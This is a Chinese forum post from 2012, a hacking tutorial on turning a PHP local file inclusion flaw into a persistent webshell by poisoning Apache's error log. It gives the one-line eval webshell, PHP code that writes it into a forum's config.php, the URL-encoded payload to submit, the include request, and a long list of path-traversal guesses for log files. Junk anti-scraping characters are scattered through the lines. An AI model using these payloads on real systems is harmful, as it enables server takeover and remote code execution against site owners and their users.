因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ( A& y/ I- H1 k6 a) a
' W- k, q6 W2 T" B2 ~比如还是这句一句话木马 / l4 r2 m& z$ g3 _
<?eval($_POST[cmd]);?> : e/ R: ?& P4 ]
# s0 b, Y3 k% E0 d4 t
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, ) g6 y4 K' Y5 c
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
8 Y5 |( M I: T! l5 n) Z
& h6 W5 U+ H8 _6 b<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
, f: c7 O) r0 m7 C& B% {4 t" j( S. nfclose($fp);?> //在config.php里写入一句木马语句 7 s% ]* F9 b4 \+ L+ `
1 Z; J! m: k1 ]9 |# W8 K$ @
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
0 K' o: y# q; h9 P转换为
- F$ v2 e m$ w9 V; |) J% R$ ]%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
; f+ \% ]: q6 O) I4 W. c( Y3 \+ S/ bconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
2 {) P1 P4 E0 k( x! }%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
! h8 H$ T7 _& Z h' mfclose%28%24fp%29%3B%3F%3E
; J) B* }9 _* S& g我们提交
# }7 w/ L. i. L7 `8 ihttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 0 ?( P, a2 w. c. Z' v6 I& g
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp ; W, p( K/ d- v5 P: N
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
% S2 D, k8 h& R- I4 Ycmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E / s3 i& ^1 f6 a
+ @$ y- z) n, _9 @
这样就错误日志里就记录下了这行写入webshell的代码。
2 z% P' N& G) U" y* h; ?我们再来包含日志,提交
, {% k& |- o! Y; vhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
5 e% h+ Q& ~2 L& j# z
+ H! h& z# p5 Z/ [: K8 `这样webshell就写入成功了,config.php里就写入一句木马语句 " Y& X9 M+ K* P+ u) } H) J z; M
OK. 5 t7 w9 p, M6 W, [7 O* t( q! P P
http://www.xxx.com/forum/config.php这个就成了我们的webshell 4 G+ ]& ]+ a$ _
直接用lanker的客户端一连,主机就是你的了。
! @0 R k; p( j0 X; H6 D
& Y7 w, b' ]; p3 O7 _PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 . v- B0 n4 A: M6 o0 U5 J
3 P" k" t- A) M2 ~. d
其他的日志路径,你可以去猜,也可以参照这里。 1 r6 R" z4 q. T3 B6 m
../../../../../../../../../../var/log/httpd/access_log . Y3 k5 ?3 X( @/ }) M6 c. b1 x$ @
../../../../../../../../../../var/log/httpd/error_log , G: H" j/ @ Y$ x
../apache/logs/error.log
+ k! y0 i/ V( P4 I+ g8 d../apache/logs/access.log
% j l% @% }/ T0 B& J* X../../apache/logs/error.log ; ^% I; X( K8 M
../../apache/logs/access.log ' i6 S$ U) Y% c1 C
../../../apache/logs/error.log 3 R! ~1 ?, y) x
../../../apache/logs/access.log 7 y$ |. w6 ~; D0 }1 n8 y+ i' t
../../../../../../../../../../etc/httpd/logs/acces_log
. e5 T+ }; ^! \../../../../../../../../../../etc/httpd/logs/acces.log
9 a' D, ?/ y. i; Y. M2 A2 y../../../../../../../../../../etc/httpd/logs/error_log
: O/ N8 k. d# s; @0 Z../../../../../../../../../../etc/httpd/logs/error.log
! j+ u5 w6 k8 a4 C2 k" Z../../../../../../../../../../var/www/logs/access_log . `9 ~ A# F! l/ ^1 t- p# M, T r L* C1 ?
../../../../../../../../../../var/www/logs/access.log
; V5 V& r& s" x0 V @ v. t../../../../../../../../../../usr/local/apache/logs/access_log + w% A; ^7 N+ f8 |$ |
../../../../../../../../../../usr/local/apache/logs/access.log ) E6 s- m# {8 z4 i. x; K0 H1 c7 V
../../../../../../../../../../var/log/apache/access_log
: d+ z5 y1 q0 f! H../../../../../../../../../../var/log/apache/access.log 0 ]+ O( E# w* a( F
../../../../../../../../../../var/log/access_log . h& a5 J! F$ u$ j2 p
../../../../../../../../../../var/www/logs/error_log
$ J' r# K5 I! \5 l7 Z../../../../../../../../../../var/www/logs/error.log 8 P* R) ]. E- v: d! k
../../../../../../../../../../usr/local/apache/logs/error_log
# V9 c: l$ T% ^$ K+ w- u! s../../../../../../../../../../usr/local/apache/logs/error.log
! W' o: R4 |7 V9 y../../../../../../../../../../var/log/apache/error_log
( q* B6 v& I( q../../../../../../../../../../var/log/apache/error.log . {0 J% h! f( j% M. ]
../../../../../../../../../../var/log/access_log
) l0 a& ?6 L3 J; B2 r1 A! e../../../../../../../../../../var/log/error_log 3 q8 ]3 `1 D. O$ U y% }
/var/log/httpd/access_log
/ e# i# S# v' ?8 W; `2 f/var/log/httpd/error_log
) ]" G$ P( F$ L0 H../apache/logs/error.log " @& z0 ]8 n1 A; g, L1 o
../apache/logs/access.log 9 N8 z7 G( F" b5 S) A" N
../../apache/logs/error.log / |' W# g( ~; i' H$ I
../../apache/logs/access.log . k# X" E# F6 {: t7 h4 d- n
../../../apache/logs/error.log
, P' _& v$ o4 x. d7 }! j" \../../../apache/logs/access.log 5 P$ k7 _4 l/ C) x: Z/ \
/etc/httpd/logs/acces_log
/ x: D( L, M& b( G( ~/etc/httpd/logs/acces.log 5 q% e; u9 d0 l6 B; Y+ [
/etc/httpd/logs/error_log
: K! B$ ^4 V3 J5 V: ^/ P/etc/httpd/logs/error.log % X3 e, d. ], L# @1 [6 S; U
/var/www/logs/access_log
6 T9 n( ]2 i& c* v9 j/var/www/logs/access.log 6 {! K7 q: J8 l- r8 Z/ w
/usr/local/apache/logs/access_log 2 u/ K- M+ Q6 j; _6 k& _4 T
/usr/local/apache/logs/access.log
/ b( u! Z: Z7 _& ~& L4 B/ @/var/log/apache/access_log
: _! E2 p) r! x6 D2 E, c# e. x/var/log/apache/access.log
. T' n1 R: M2 s+ ~% H/var/log/access_log ' a. E2 s6 D9 X D5 {' k
/var/www/logs/error_log 9 Y" x2 y3 P. y& Q/ Y/ R# K
/var/www/logs/error.log
* e3 q# Q* h( T* F/ u# S1 Q; F. g/usr/local/apache/logs/error_log
; D. o2 I, z/ e, a/usr/local/apache/logs/error.log 8 r; y& E6 V% i/ e) A
/var/log/apache/error_log
6 L3 o' j3 x; y* c4 ~/var/log/apache/error.log {* g. p9 V7 F) b
/var/log/access_log 6 B+ V- o0 v( x% U) J
/var/log/error_log |
发表于 2012-9-15 14:27:40
收藏
支持
反对